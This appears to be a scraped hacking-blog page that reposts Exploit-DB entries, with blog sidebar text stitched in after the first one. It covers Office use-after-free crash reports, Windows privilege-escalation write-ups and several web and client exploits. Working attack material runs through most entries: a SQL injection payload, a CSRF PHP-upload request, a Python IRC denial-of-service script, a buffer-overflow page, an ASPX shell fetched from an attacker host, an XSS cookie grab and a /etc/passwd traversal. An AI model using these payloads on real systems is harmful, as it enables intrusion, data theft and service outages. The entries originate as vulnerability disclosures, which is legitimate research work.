Source: https://code.google.com/p/google-security-research/issues/detail?id=464
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls
The minimized crashing file shows two one bit deltas from the original file. The first delta at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offset appear to be BIFFRecord lengths.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=00000000 ebx=00000000 ecx=00000000 edx=0012e3bc esi=0ecd8ff0 edi=0000089e
eip=3035a5ed esp=0012e3b0 ebp=0012e410 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
3035a5e4 0f8530270a00 jne Excel!Ordinal40+0x3fcd1a (303fcd1a)
3035a5ea 8b7518 mov esi,dword ptr [ebp+18h]
Excel!Ordinal40+0x35a5ed:
3035a5ed 8b0e mov ecx,dword ptr [esi] ds:0023:0ecd8ff0=????????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e410 3035ab4d 00134dc0 0000089e 00000028 Excel!Ordinal40+0x35a5ed
00130464 3035ab9e 00000028 0000000a ffffffff Excel!Ordinal40+0x35ab4d
00131ef0 3026f1cd 00000002 00000000 00000118 Excel!Ordinal40+0x35ab9e
00132514 3026d160 0000000a 00132560 00000118 Excel!Ordinal40+0x26f1cd
0013279c 30263a3d 0e1ecfb8 0000000a 00000000 Excel!Ordinal40+0x26d160
00132c98 302636a5 0e1ecfb8 00000004 00132d20 Excel!Ordinal40+0x263a3d
00132cac 3025869a 00000004 00132d20 00000000 Excel!Ordinal40+0x2636a5
00132d2c 30258553 00134dc0 0000001a 00132d58 Excel!Ordinal40+0x25869a
00132e7c 30258470 30edc060 0e17ac00 0ebb7fac Excel!Ordinal40+0x258553
00132e94 32c50135 30edc060 0e17ac00 00133190 Excel!Ordinal40+0x258470
00132f48 32c4fb6d 00133190 0e83ce38 00000001 mso!Ordinal6768+0x13e7
00132f98 32c4fd30 00133190 00132fec 00000001 mso!Ordinal6768+0xe1f
00132ff8 32c4fb6d 000001be 0e83ce38 00000001 mso!Ordinal6768+0xfe2
00133048 32c4f756 00133190 001330cc 00000000 mso!Ordinal6768+0xe1f
00133108 32c4f0e2 00133190 30eba978 0e74ed90 mso!Ordinal6768+0xa08
0013313c 302583f2 0e74ed90 00133190 0e83ce38 mso!Ordinal6768+0x394
001331c8 302582df 0cc88fd8 00134dc0 00002020 Excel!Ordinal40+0x2583f2
00133f44 301153f9 0cc88fd8 00134b88 00000102 Excel!Ordinal40+0x2582df
We can see that esi is holding a pointer to invalid memory. This is a heap address.
0:000> !heap -p -a 0xecd8ff0
address 0ecd8ff0 found in
_DPH_HEAP_ROOT @ 1161000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
eb04f40: ecd8000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
3025ac56 Excel!Ordinal40+0x0025ac56
3026f1cd Excel!Ordinal40+0x0026f1cd
3026d160 Excel!Ordinal40+0x0026d160
30263a3d Excel!Ordinal40+0x00263a3d
302636a5 Excel!Ordinal40+0x002636a5
3025869a Excel!Ordinal40+0x0025869a
30258553 Excel!Ordinal40+0x00258553
30258470 Excel!Ordinal40+0x00258470
32c50135 mso!Ordinal6768+0x000013e7
32c4fb6d mso!Ordinal6768+0x00000e1f
Esi is a free-ed allocation. This is a use after free vulnerability.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151849
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=462
The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with application verifier basic checks enabled.
Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls
The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord.
File versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=00000000 ebx=00000000 ecx=0ce119f8 edx=00003fff esi=0e98de10 edi=0013c82c
eip=30037cc5 esp=00137180 ebp=00137188 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x37cc5:
30037cc5 0fb64604 movzx eax,byte ptr [esi+4] ds:0023:0e98de14=??
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00137188 303df098 0e98de10 00000000 00000102 Excel!Ordinal40+0x37cc5
0013d068 30528190 0013d0a8 00000102 00000000 Excel!Ordinal40+0x3df098
0013d2bc 305280b1 00000000 00000001 00000008 Excel!Ordinal40+0x528190
0013d330 3038d46d 0013ddf2 00000000 00000001 Excel!Ordinal40+0x5280b1
0013e000 300084a4 0013e104 00000001 0013f568 Excel!Ordinal40+0x38d46d
0013fbb0 30005e9a 02270fd7 00000003 30f61708 Excel!Ordinal40+0x84a4
0013feb8 30003b3a 00000000 02270fd7 00000003 Excel!Ordinal40+0x5e9a
0013ff30 30003884 30000000 00000000 02270fd7 Excel!Ordinal40+0x3b3a
In this crash esi is a heap address. We can see that this is a free chunk:
0:000> !heap -p -a 0xe98de10
address 0e98de10 found in
_DPH_HEAP_ROOT @ 1161000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
e7f0fc0: e98d000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
30298310 Excel!Ordinal40+0x00298310
30300ac3 Excel!Ordinal40+0x00300ac3
305f1899 Excel!Ordinal40+0x005f1899
This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38214.zip
# Exploit Title: Web Application Farol with anauthenticated SQLi injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection
+---------------------+
+ Product Description +
+---------------------+
The FAROL web application is a software that monitors the databases
+----------------------+
+ Exploitation Details +
+----------------------+
A vulnerability has been detected in the login page from web application FAROL . Sql injection anauthenticated.
The e-mail field at login page is vulnerable.
The e-mail field is vulnerable to Error Based Sql injection.
Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage:email'[SQLi error based]--
eg:
email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
+----------+
+ Solution +
+----------+
Upgrade the software
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 CSRF Content Upload and PHP Script Execution
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to upload normally disallowed PHP
script files.
This issue can only be exploited by authenticated users, however admin role
is not required.
Additionally, KirbyCMS has another vulnerability - Cross-Site Request Forgery
(CSRF) - which may allow attackers to perform file upload actions on behalf
of an already authenticated KirbyCMS users, if an attacker manages to trick
them into visiting a specially-crafted website.
This issue can allow an unauthorised attacker to modify or upload new content.
Both of the issues can be combined to execute arbitrary PHP code on the
remote server hosting KirbyCMS, if a logged-in victim visits a malicious page
containing an exploit crafted by an attacker.
IV. PHP Code Execution
-------------------------
KirbyCMS allows to upload content to both admin and a low privileged editor
users who can access the control panel.
The upload feature allows to upload images and other media files which can
be referenced within the content once uploaded.
KirbyCMS performs the following validation before saving an uploaded file
to prohibit risky uploads:
---[ panel/app/controllers/api/files.php ]---
protected function checkUpload($file, $blueprint) {
if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
throw new Exception('Content files cannot be uploaded');
} else if(strtolower($file->extension()) == 'php' or
in_array($file->mime(), f::$mimes['php'])) {
throw new Exception('PHP files cannot be uploaded');
} else if(strtolower($file->extension()) == 'html' or
$file->mime() == 'text/html') {
throw new Exception('HTML files cannot be uploaded');
...
}
---------------------------------------------
As we can see it prevents uploading PHP files by checking if an uploaded file
has a '.php' extension, or if the discovered MIME type of the file has been
evaluated to PHP. KirbyCMS throws an exception and stops further processing
if either of the conditions is true.
Unfortunately, both of the checks can easily be bypassed on multiple server
configurations.
As many server configurations such as Ubuntu, or Debian, process several
file extensions as PHP scripts, e.g.: .php, .php4, .php5.
The extension check can for example be evaded by simply uploading a malicious
file with the '.php4' extension.
The MIME type check can also be easily bypassed by preceding the <?php script
tags with <?xml tags , to trick the MIME detector into recognising
the malicious file as XML thus passing the check (mime['php'] != mime['xml']).
As the upload directory is not set to disable script execution by default,
bypassing the checks allows to upload arbitrary PHP scripts and execute them
on the remote server hosting a vulnerable KirbyCMS installation.
V. CSRF
-------------------------
Media files are only meant to be uploaded by authenticated users such
as editors or site administrators.
However, KirbyCMS's upload function does not protect against
cross-site request forgery by including a special CSRF token to verify
the source of the request.
As a result, an attacker can prepare a specially-crafted webpage which will
upload a malicious file to the remote KirbyCMS site without user's permission,
if the attacker manages to trick the logged-in victim into visiting his page.
VI. PROOF OF CONCEPT
-------------------------
Both of the issues described above can be combined to prepare a malicious page
which uploads an arbitrary PHP file as soon as a victim authenticated
into KirbyCMS visits the page.
An malicious CSRF html page could send a request similar to the following:
POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...
-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php
<?xml >
<?php
phpinfo();
?>
-----------------------------4679830631250006491995140822--
uploading the file as a result into the: kirby/content/1-about
directory on the server.
The malicious file can then be accessed via the URL:
http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5
Once opened, phpinfo() page should be loaded.
VII. BUSINESS IMPACT
-------------------------
By combining the two issues an attacker could execute arbitrary PHP code
on the remote server without any authentication to gain full control over
the website using a vulnerable KirbyCMS.
VIII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the PHP script execution vulnerability the webserver must be
configured to process files as PHP with extensions other than .php.
Ubuntu and Debian systems fulfill this condition. There might be more systems
which are configured in this way by default, or have been reconfigured to
do so.
To gain access to the control panel and upload a malicious PHP file, an
attacker may be able to exploit a separate, Authentication Bypass issue also
discovered by Dawid Golunski, described in a separate document.
IX. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
X. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
XI. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XII. REVISION HISTORY
-------------------------
14.09.2015 - Final
XIII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
source: https://www.securityfocus.com/bid/57256/info
The Gallery plugin for WordPress is prone to an arbitrary file-access vulnerability.
Remote attackers can exploit this issue to read arbitrary files. This may lead to further attacks.
Gallery 3.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
source: https://www.securityfocus.com/bid/57255/info
Colloquy is prone to a remote denial-of-service vulnerability.
Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
Colloquy 1.3.5 and 1.3.6 are vulnerable.
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
shellcode = {
# One Shot <3
'one_shot' : [ \
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
# 1.3.5
'1_3_5' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" )
sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if ' 396 ' in host_data:
print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUIT\r\n' )
sock.close()
break
try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
continue
except:
pass
print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
args = parser.parse_args()
if args.nick is None:
parser.print_help()
exit()
connect( args.target, args.port, args.nick, args.shellcode.strip() )
source: https://www.securityfocus.com/bid/57254/info
Quick.Cms and Quick.Cart are prone to a cross-site scripting vulnerability because they fail to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following products are vulnerable:
Quick.Cms 5.0
Quick.Cart 6.0
http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/
source: https://www.securityfocus.com/bid/57249/info
Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v.
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of
Concept">
</body>
<object
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>
source: https://www.securityfocus.com/bid/57243/info
BT Home Hub is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Failed exploit attempts will likely crash the affected application.
BT Home Hub 3.0b is vulnerable; other versions may also be affected.
#
*******************************************************************************
#
*******************************************************************************
# ***************** These files are licensed GPLv2. ****************
# ******************* See included LICENSE for more info.
*******************
#
*******************************************************************************
#
*******************************************************************************
# ************************ From your leet hacking cr3w
************************
# ******************************* *******************************
# ********************************** at
**********************************
# ************ http://www.tacnetsol.com ***********
#
*******************************************************************************
# Copyright (c) 2013 Zachary Cutlip
# Tactical Network Solutions, LLC
class MsearchCrash:
def __init__(self,overflowbuffer):
self.__msearch_text__=\
"M-SEARCH * HTTP/1.1\r\n"+\
"HOST:239.255.255.250:1900\r\n"+\
"ST:uuid:"+str(overflowbuffer)+"\r\n"\
"MX:2\r\n"+\
'MAN:"ssdp:discover"'+"\r\n\r\n"
def __str__(self):
return self.__msearch_text__
source: https://www.securityfocus.com/bid/57242/info
Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
Prizm Content Connect 5.1 is vulnerable; other versions may also be affected.
Proof of concept
First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:
http://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx
The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:
Document Location: C:\Project\
Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx
Temp Location: C:\tempcache\
The attacker then requests the ASPX shell from the root of the website:
http://www.example.com/ajwyfw45itxwys45fgzomrmv.aspx
source: https://www.securityfocus.com/bid/57237/info
Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.
Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected.
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1
Source: https://code.google.com/p/google-security-research/issues/detail?id=439
Windows: CreateObjectTask TileUserBroker Elevation of Privilege
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the TileUserBroker COM object. This object doesn’t take into account the caller when writing and deleting files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is allows a user to set their account picture for the logon screen.
By calling CUserTileBroker::SetUserTile (implemented in Windows.UI.Immersive.dll) we can get the system service to write the account pictures to c:\users\public\AccountPictures\SID. Once the files are written it will try and delete any file not expected in that folder, this is done as the system user. We can abuse this functionality by placing a junction where the SID component is and point it to an arbitrary location. This would allow us to delete arbitrary files on the system or potentially replace a file with the one of the JPEGs (which are reencoded). Replacing files is trickier as the file names have a random GUID attached, however the service writes 5 files, so there’s a race condition where the GUID could be read from one of those files then used to redirect the writes. Also the rencoding might make it difficult to inject any meaningful content.
If a user has not configured an account picture before (which probably means only local/domain users rather than Microsoft accounts) then the folder c:\users\public\AccountPictures\SID doesn’t exist. Even if another user has set their picture on the same machine the AccountPictures directory has sufficient permissions to add a new directory in its place. If the user has configured their account picture then this will not work as the directory permissions of the SID directory are very restrictive.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting the file contents of an arbitrary directory passed on the command line. The password for the 7z file is ‘password’.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC pass the path to the directory to delete as the first parameter. For example poc.exe c:\windows\temp
3) The PoC should complete execution.
NOTE: If Access Denied is printed then it’s probably that the account picture has already been setup on the machine which makes the exploit not work.
Expected Result:
The system service should determine that it cannot delete the contents of the picture directory
Observed Result:
The passed path has all its files deleted (assuming they can be accessed by local system).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38201.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=437
Windows: CreateObjectTask SettingsSyncDiagnostics Elevation of Privilege
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the SettingsSyncDiagnostics COM object. This object doesn’t take into account the caller when copying logs files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is a diagnostic class for setting synchronization implemented in SettingSync.dll.
This class allows an event log to be initialized with the StartLogging method and then the logs copied to an arbitary location with the StopLogging method. The StopLogging method doesn’t impersonate the caller when moving the logs to the user defined location which means it runs as local system. It’s possible to use this to copy the log files to arbitrary locations using appropriate symbolic link attacks. We can get data into the log file by sending trace events to the appropriate provider, this could allow string data to be added to the file. The name of the file is under attacker control so it can be renamed to .hta or .ps1 which would allow the limited control over the contents to be abused in error tolerant script engines.
Another way of exploiting this takes into account that the SHFileOperations call which moves the file resets the ACLs (where applicable) on the file to match the expected inherited permissions. So for example you could drop the file as c:\program.exe and it would pick up the default DACL for C:\ (which allows Authenticated Users modify permissions) but the call doesn’t reapply the High IL label. This could be used indirectly in bad system services with unquoted file paths as the normal user could re-write the files contents to an malicious executable. A second trick with this is there’s a race between the move and the resetting of the ACLs. As the shell uses TreeSetNamedSecurityInfo it will also walk directory hierarchies, therefore by switching the symlink from the original target to a directory (say c:\users) you can force parts of the system drive to reset their ACLs, leading to the user being able to modify new parts of the file system which again could be exploited..
Exploitation is complicated somewhat by a bug in the proxy in actxprxy.dll. Presumably in the original MIDL file for the COM object the StopLogging method is incorrectly marked, the single WCHAR* parameter is missing the [string] attribute. This results in the built-in proxy only marshalling a single WCHAR to the server, this tends to cause things to not work so well and leads to a limited information disclosure as whatever’s after the single character in memory up to the next NUL is assumed to be part of the path. Fortunately the stub is sufficiently simple that by sending a plain array buffer to the server it’ll pick up the correct data. I’ve done this in the PoC by implementing my own custom COM proxy object.
Proof of Concept:
The PoC demonstrates the vulnerability by copying the log file to the system drive. The password for the 7z file is ‘password’.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC.
3) The PoC should complete execution.
Expected Result:
The log file should fail to be moved to the specified target.
Observed Result:
The log file ends up copied to c:\program.exe and can be modified by the current user.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38202.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=442
Windows: Task Scheduler DeleteExpiredTaskAfter File Deletion Elevation of Privilege
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
Class: Elevation of Privilege
Summary:
The Task Scheduler can be made to delete a task after it’s trigger has expired. No check is made to ensure the task file is not a junction which allows arbitrary files to be deleted by the system user leading to EoP.
Description:
If a scheduled task is configured with DeleteExpiredTaskAfter setting the service will delete the task including its task file after the triggers have expired. It does the deletion in a timer callback thread but doesn’t call DeleteFile with the privileges of the task, instead running at local system. While the scheduler now seems to do some checking on the path for junction attacks this only seems to be at creation time not when it’s deleting the task file. Therefore you can mount a junction attack against the deletion process which allows you to delete any file or directory on the system which local system can delete. To delete directories you’d have to use a more advanced trick than just a directory junction as you’d need to the point the task file to name::$INDEX_ALLOCATION but it will work.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting an arbitrary file from the system. You need to modify the $filetodelete variable to select a different file to test other than c:\protected\test
1) Copy the PoC to a location on a local hard disk and rename the file’s extension to .ps1.
2) Enable powershell scripting for the current user, this doesn’t affect the actual exploit, it’s just to get powershell to execute the script.
2) As a normal user execute the powershell PoC
3) The PoC should complete execution.
Expected Result:
The service should detect the directory junction and not delete the target file
Observed Result:
The target file is deleted
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38200.ps1
Source: https://code.google.com/p/google-security-research/issues/detail?id=461
Windows: NtUserGetClipboardAccessToken Token Leak Redux
Platform: Windows 8.1 Update, Windows 10 Build 10130
Class: Security Bypass/EoP
Summary:
The NtUserGetClipboardAccessToken win32k system call exposes the access token of the last user to lower-privileged users. It can also be used to open an anonymous impersonation thread token which normally OpenThreadToken shouldn't be able to do. This is a bypass of the fix for CVE-2015-0078.
Description:
This was supposedly fixed as CVE-2015-0078 in MS15-023 to prevent access to the token from any process running below medium IL. The check is roughly:
if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}
This is possible to bypass because IsImmersiveBroker level is trivial to get. It seems Win32k sets the appropriate Win32Process flag when first initializing the process and converting it to a GUI thread. If the executable is signed by a Microsoft certificate and has a specially named section of “.imrsiv” the flag will be set, however this will be done regardless of the IL of the process. Therefore you can create a process using one of the pre signed executables, such as explorer.exe, RuntimeBroker.exe or LicensingUI.exe then inject a DLL into the process. This allows you to bypass the check and capture the token.
I’ve had a quick look at what else might be exploitable from being able to get IsImmersiveBroker to return true. Nothing stands out but it’s probably worth restricted the IL level of processes allowed to get this flag set.
Proof of Concept:
I’ve provided a PoC which will capture any token currently on the clipboard that it can access. It creates an instance of LicensingUI.exe and injects a DLL into it. Note the built executables are for x64 Windows, you'll need to rebuild to test on 32 bit. The password for the archive is "password".
1) Copy the PoC to a directory, including the executable and the DLL
2) Execute the Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe as a low integrity process. You can do this by marking the executable file with low IL using icacls or by using psexec.
3) Perform a clipboard operation, for example select some text and copy it to the clipboard
4) The PoC should show it has opened a token by opening a message dialog, if you inspect the tokens it’s likely to show a primary token has been captured with medium IL.
Expected Result:
It shouldn’t be possible to capture the token.
Observed Result:
The token was captured in the low IL process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38199.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=468
Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege
Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. It’s possible execute arbitrary code within the context of the process because it’s possible to access the processes threads leading to local EoP.
Description:
NOTE: This was tested on the latest available build on Windows 10. I don’t know if the final version will change the functionality to fix this vulnerability.
